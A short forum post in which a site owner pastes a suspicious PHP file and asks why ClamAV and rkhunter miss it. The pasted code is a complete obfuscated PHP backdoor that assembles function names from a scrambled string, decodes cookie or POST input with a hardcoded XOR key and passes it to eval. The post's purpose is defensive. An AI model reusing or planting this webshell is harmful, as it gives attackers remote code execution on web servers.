Hello. I see php files looks like wirus.
the content of this file is:
I use clamav and rkhunter but non off them recognize this infected file. Is there any other software which can remove this fie or mark as infected ?
the content of this file is:
Code:
<?php
$sjzwewe = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';$qgrywj = Array();$qgrywj[] = $sjzwewe[18].$sjzwewe[33];$qgrywj[] = $sjzwewe[1].$sjzwewe[31].$sjzwewe[9].$sjzwewe[19].$sjzwewe[8].$sjzwewe[3].$sjzwewe[1].$sjzwewe[1].$sjzwewe[23].$sjzwewe[25].$sjzwewe[14].$sjzwewe[1].$sjzwewe[25].$sjzwewe[23].$sjzwewe[6].$sjzwewe[1].$sjzwewe[13].$sjzwewe[31].$sjzwewe[23].$sjzwewe[21].$sjzwewe[5].$sjzwewe[13].$sjzwewe[6].$sjzwewe[23].$sjzwewe[14].$sjzwewe[19].$sjzwewe[6].$sjzwewe[21].$sjzwewe[19].$sjzwewe[3].$sjzwewe[11].$sjzwewe[1].$sjzwewe[12].$sjzwewe[21].$sjzwewe[21].$sjzwewe[19];$qgrywj[] = $sjzwewe[15];$qgrywj[] = $sjzwewe[1].$sjzwewe[7].$sjzwewe[17].$sjzwewe[26].$sjzwewe[16];$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[0].$sjzwewe[4].$sjzwewe[9].$sjzwewe[22].$sjzwewe[9].$sjzwewe[31].$sjzwewe[16];$qgrywj[] = $sjzwewe[9].$sjzwewe[20].$sjzwewe[22].$sjzwewe[32].$sjzwewe[7].$sjzwewe[19].$sjzwewe[9];$qgrywj[] = $sjzwewe[10].$sjzwewe[17].$sjzwewe[21].$sjzwewe[10].$sjzwewe[16].$sjzwewe[4];$qgrywj[] = $sjzwewe[31].$sjzwewe[4].$sjzwewe[4].$sjzwewe[31].$sjzwewe[28].$sjzwewe[0].$sjzwewe[27].$sjzwewe[9].$sjzwewe[4].$sjzwewe[30].$sjzwewe[9];$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[32].$sjzwewe[9].$sjzwewe[26];$qgrywj[] = $sjzwewe[22].$sjzwewe[31].$sjzwewe[1].$sjzwewe[24];foreach ($qgrywj[7]($_COOKIE, $_POST) as $txsfwcl => $mhbtlou){function xvidonr($qgrywj, $txsfwcl, $pcvfru){return $qgrywj[6]($qgrywj[4]($txsfwcl . $qgrywj[1], ($pcvfru / $qgrywj[8]($txsfwcl)) + 1), 0, $pcvfru);}function xtddq($qgrywj, $xrsscmu){return @$qgrywj[9]($qgrywj[0], $xrsscmu);}function lqzmlux($qgrywj, $xrsscmu){$mzvrgh = $qgrywj[3]($xrsscmu) % 3;if (!$mzvrgh) {eval($xrsscmu[1]($xrsscmu[2]));exit();}}$mhbtlou = xtddq($qgrywj, $mhbtlou);lqzmlux($qgrywj, $qgrywj[5]($qgrywj[2], $mhbtlou ^ xvidonr($qgrywj, $txsfwcl, $qgrywj[8]($mhbtlou))));}
I use clamav and rkhunter but non off them recognize this infected file. Is there any other software which can remove this fie or mark as infected ?
Last edited by a moderator: